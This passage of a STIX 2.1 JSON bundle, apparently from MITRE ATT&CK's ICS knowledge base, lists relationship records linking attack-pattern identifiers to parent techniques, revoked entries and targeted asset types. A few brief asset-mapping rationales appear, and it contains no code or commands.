"relationship--e6fa0699-430b-4506-9a6d-286b22381206", "created": "2020-01-28T14:05:17.985Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", "target_ref": "attack-pattern--e01be9c5-e763-4caf-aeb7-000b416aef67", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e7339f46-a3f5-47c8-9850-313797cd6fb2", "created": "2020-10-02T16:56:49.838Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--166de1c6-2814-4fe5-8438-4e80f76b169f", "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e75f88e6-1ffb-467b-b488-46e91cb3e1e9", "created": "2023-09-28T19:42:16.270Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:42:16.270Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e79825fb-3bd0-41e7-9bdd-257cd3ab44a2", "created": "2023-09-29T16:45:20.769Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:45:20.769Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e7abc5ca-ca57-459a-b422-331f3f4d4506", "created": "2020-01-13T15:48:56.688Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d", "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e7c8615b-2dd4-42a9-9535-2deed30ea8d7", "created": "2019-11-27T14:31:56.861Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "target_ref": "attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e83a79df-2555-4b2f-9ade-b9ed2689ae42", "created": "2023-09-29T16:39:41.736Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:39:41.736Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e8b07bb0-a0d3-49b2-a6c4-f546c50cdb64", "created": "2020-01-31T18:59:22.084Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--8df54627-376c-487c-a09c-7d2b5620f56e", "target_ref": "attack-pattern--4ff5d6a8-c062-4c68-a778-36fc5edd564f", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e8ef9bb9-1335-4418-b788-f8220dbbe4c8", "created": "2023-09-28T19:50:30.312Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:50:30.312Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", "target_ref": "x-mitre-asset--986c455b-0f43-42b6-8360-33ac48bd9990", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e915e12c-3d0c-4f60-b119-9414940abb0b", "created": "2023-09-28T20:08:27.145Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:08:27.145Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e923fe9c-ccae-4d5a-a85c-89b398ee1ed5", "created": "2024-02-06T16:20:42.323Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2024-02-06T16:20:42.323Z", "description": "", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--e6f19759-dde3-47fc-99cc-d9f5fa4ade60", "target_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e92c4fd7-eb92-4255-80c3-abaa9262845f", "created": "2020-02-12T18:57:36.126Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8", "target_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e95fe824-4df1-49a2-abf7-5d76fb47ef42", "created": "2023-09-28T19:45:18.672Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:45:18.672Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c5e3cdbc-0387-4be9-8f83-ff5c0865f377", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--e98892d6-e036-4140-adbb-2932dba51a19", "created": "2023-09-28T20:08:09.519Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:08:09.519Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea022ac4-0c8b-4ad0-a160-14640654df2e", "created": "2020-02-05T18:59:28.794Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--1b84d551-6de8-4b96-9930-d177677c3b1d", "target_ref": "attack-pattern--32901740-b42c-4fdd-bc02-345b5dc57082", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ea774e46-3dcb-4cda-ad99-a012ad8fbb58", "created": "2020-01-31T12:32:52.545Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--d3046a90-580c-4004-8208-66915bc29830", "target_ref": "attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eac205a6-271b-4a86-acf3-6f4ddefb82c4", "created": "2023-09-29T17:38:59.611Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:38:59.611Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eadb4ca5-ee99-4169-a926-95b1ff82e960", "created": "2023-09-28T20:28:52.768Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:28:52.768Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eae674f9-10a2-41e6-9cd3-205af8e69d53", "created": "2023-09-28T20:05:15.314Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T20:05:15.314Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb171086-88e1-4f24-bd7e-c3f8b3c3283b", "created": "2023-09-28T19:44:09.311Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T19:44:09.311Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eb5310c6-7500-4b16-8ca7-6678c6232001", "created": "2023-09-29T19:36:38.824Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T19:36:38.824Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ebc9f35c-6f95-4bc0-b8b3-f9b515690fa0", "created": "2023-09-29T17:09:37.977Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:09:37.977Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ec467f15-0f62-483f-a250-da5109e6936a", "created": "2024-05-22T17:17:26.115Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:35:52.158Z", "description": "Asset Mapping Rationale: Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves.", "relationship_type": "targets", "source_ref": "attack-pattern--ae7f3575-0a5e-427e-991b-fe03ad44c754", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ecaf20c0-d881-45b4-98f2-a456e07d3643", "created": "2023-09-28T21:25:48.379Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:25:48.379Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", "target_ref": "x-mitre-asset--e2c3336a-dd93-44d6-8246-f93cf132c499", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ecdbe751-ef08-41fe-8c13-27ffaae30312", "created": "2020-02-05T14:04:26.307Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--5bfccc3f-2326-4112-86cc-c1ece9d8a2b5", "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ecf3d7ec-a8f9-435a-9c09-6d264f319728", "created": "2020-01-24T14:48:05.786Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--4bf5845d-a814-4490-bc5c-ccdee6043025", "target_ref": "attack-pattern--7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed095993-bc85-431e-9621-437143f16d44", "created": "2023-09-29T17:44:09.285Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:44:09.285Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed3ce006-cf41-46f6-bd86-054314c130dc", "created": "2023-09-28T21:15:57.120Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:15:57.120Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed3de8e8-e09c-4273-8f68-da5219a7e9ee", "created": "2021-03-17T20:09:13.260Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3ee16395-03f0-4690-a32e-69ce9ada0f9e", "target_ref": "attack-pattern--84771bc3-f6a0-403e-b144-01af70e5fda0", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed3ef546-566a-46c7-918e-7bfa10d05991", "created": "2023-09-29T17:06:47.370Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:06:47.370Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ab390887-afc0-4715-826d-b1b167d522ae", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed66e087-8877-4146-a16a-44cfd144a3d8", "created": "2023-09-29T17:07:00.450Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:07:00.450Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed8b97e2-5966-4844-a636-524541a46e43", "created": "2023-09-29T16:39:18.448Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:39:18.448Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ed9b40ef-51ff-4263-a99e-5c95bae3e17d", "created": "2020-02-04T13:03:03.632Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "revoked-by", "source_ref": "attack-pattern--44dca04b-808d-46ca-b25f-d85236d4b9f8", "target_ref": "attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--eda23a3d-a1d0-4e98-85fc-5ac083f53f5c", "created": "2020-01-13T16:33:20.771Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2022-04-25T14:00:00.188Z", "relationship_type": "subtechnique-of", "source_ref": "attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44", "target_ref": "attack-pattern--2c4d4e92-0ccf-4a97-b54c-86d662988a53", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_version": "1.0", "x_mitre_attack_spec_version": "2.1.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--edaa6f5c-1b59-4ecb-a20f-716a61cdaccb", "created": "2023-09-29T16:39:29.206Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T16:39:29.206Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--edccbe1f-a07a-405e-9b9a-b247ce3dcc9b", "created": "2023-09-29T17:58:54.996Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-29T17:58:54.996Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--ede2b798-2f39-419e-a7d3-8f0c733af4c1", "created": "2023-09-28T21:12:00.004Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "modified": "2023-09-28T21:12:00.004Z", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "external_references": []}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--edf5f8bd-4258-4d84-b5fc-d90984b68eee", "created": "2024-05-22T17:18:51.755Z", "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-05-28T03:36:29.404Z", "description": "Asset Mapping Rationale: Adversaries may bridge network boundaries by compromising perimeter network devices or internal devices responsible for network segmentation.", "relationship_type": "targets", "source_ref": "attack-pattern--b8017880-4b1e-42de-ad10-ae7ac6705166", "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0", "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--edfa4bcb-6304-42df-b7c6-8caf480c66f2", "created": "2023-09-29T17:58:04.082Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "object_marking_refs": 